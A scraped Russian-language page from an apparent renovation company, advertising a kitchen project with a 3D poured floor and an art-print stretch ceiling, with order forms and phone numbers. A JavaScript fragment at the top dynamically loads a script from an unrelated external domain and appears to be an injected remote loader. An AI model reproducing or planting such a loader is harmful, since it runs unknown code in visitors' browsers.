, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); } var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Заказать услуги онлайн




Заполните форму ниже, чтоби оставить заявку на наши услуги или продукцию. Наши специалисты обязательно свяжутся с Вами в ближайшее время!

Поля, помеченные *,обязательны для заполнения


Имя

заказ  

телефон*

Перезвонить Вам?




Закажите БЕСПЛАТНЫЙ обратный звонок нашего специалиста, и он обязательно свяжется с Вами в ближайшее время

Поля, помеченные *, обязательны для заполнения

Ваше имя

Номер телефона*

(812) 372-67-66

Москва

(495) 638-52-50

Санкт-Петербург

(812) 372-67-66


3D-пол на кухне — рецепт хорошего настроения!

наливной пол 3d Сегодня мы вновь рады пригласить вас на кухню. А раз уж там принято готовить, то главным блюдом в нашем меню станет хорошее настроение. На десерт же мы припасли заряд положительных эмоций, приправленный домашним уютом. Правда, сразу хотим предупредить, что готовить мы будем очень высококалорийные блюда – полученной энергии хватит на весь день!

С чего это мы оперируем гастрономической лексикой? Дело в том, что нашими специалистами успешно завершен очередной проект, и связан он как раз с ремонтом кухни.

Для хозяина квартиры – руководителя детской городской больницы Санкт-Петербурга – кухня имеет особое значение. Доктор с многолетним стажем и «горящий» работой человек, он практически все время проводит в стенах больницы, каждый день сталкиваясь с болью и спасая жизни малышей. Лишь ранним утром у него есть пара минут свободного времени, чтобы выпить чашечку ароматного кофе, пролистать свежую газету и насладиться домашним уютом. И за эти пару минут очень важно получить заряд положительной энергии, который поможет весь день чувствовать себя в тонусе.

наливной пол 3d Нами была разработана единая концепция решения дизайна интерьера кухни. Эффектно и стильно смотрится наливной пол на кухне с рисунком в виде капелек. Создается ощущение, что совсем недавно прямо здесь в комнате прошел теплый летний дождь. А знаете ли вы, что капли воды вызывают у человека чувство восторга и радости, что ранним утром поможет стряхнуть остатки сна. Ярким акцентом всего интерьера кухни, безусловно, служит натяжной потолок с невероятным рисунком – огромными лепестками баклажанного цвета. Добиться такого потрясающего визуального эффекта помогают натяжные потолки с арт печатью. С их помощью можно воплотить в жизни самые смелые дизайнерские задумки. Общую стилистику интерьера великолепно дополняет декоративный кухонный фартук, рисунок которого повторяет изображение на потолке.

Кстати, именно декоративные кухонные фартуки часто являются главными помощниками, когда нужно связать все элементы интерьера кухни в единое целое или выделить яркий акцент.

Воплощая в жизнь этот проект, нам удалось главное – сделать эту кухню действительно уютным, ярким и позитивным местом в доме. Теперь каждое утро она наполняется ароматом кофе и шелестящими звуками переворачивающихся страниц газеты. В жизни ее хозяина каждая минута имеет вес золота, но утреннее время бесценно, так как позволяет насладиться гармонией жизни.